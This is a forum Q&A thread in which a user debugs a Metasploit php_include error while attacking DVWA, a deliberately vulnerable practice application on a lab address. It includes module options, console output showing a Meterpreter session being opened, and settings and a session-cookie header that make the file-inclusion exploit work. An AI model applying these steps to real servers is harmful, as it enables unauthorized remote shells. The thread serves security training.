# Metasploit php_include 'undefined method `remove_resource' for nil:NilClass'

Tags: php, exploit, metasploit

I'm trying to exploit the dvwa File Inclusion vulnerability.
I'm refering to this tutorial: 
http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter

When I run 'exploit', I get the following error: 
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

The options I set:

```
msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

   Name      Current Setting                                                           Required  Description
   ----      ---------------                                                           --------  -----------
   HEADERS                                                                             no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   PATH      /                                                                         yes       The base directory to prepend to the URL to try
   PHPRFIDB  /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /dvwa/vulnerabilities/fi/?page=XXpathXX                                   no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                                            no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                                             no        Use a proxy chain
   RHOST     172.16.246.131                                                            yes       The target address
   RPORT     80                                                                        yes       The target port
   SRVHOST   0.0.0.0                                                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080                                                                      yes       The local port to listen on.
   SSLCert                                                                             no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                                             no        The URI to use for this exploit (default is random)
   VHOST                                                                               no        HTTP server virtual host


Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.246.131   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(php_include) > run

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*]  Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
```

Thanks for help!

Comment: Did you get it working? Need anything adding to my answer?

Answer (score 0):

This error also seems to appear when the exploit is successful:

```
msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.1.2:443 
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

meterpreter > getuid
Server username: apache (48)
```

Make sure that the `PATH` and `PHPURI` settings are set correctly. You may need them to be as follows:

```
set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX
```

Check with Wireshark that the URL is sent as expected.

Also, it could be that certain outbound ports are blocked, so experiment with different values.

In the specific case of DVWA, you will need to pass the session cookie using the `HEADERS` parameter. Get this from your logged in browser session and then set as follows:

`set HEADERS cookie=PHPSESSIONID=....`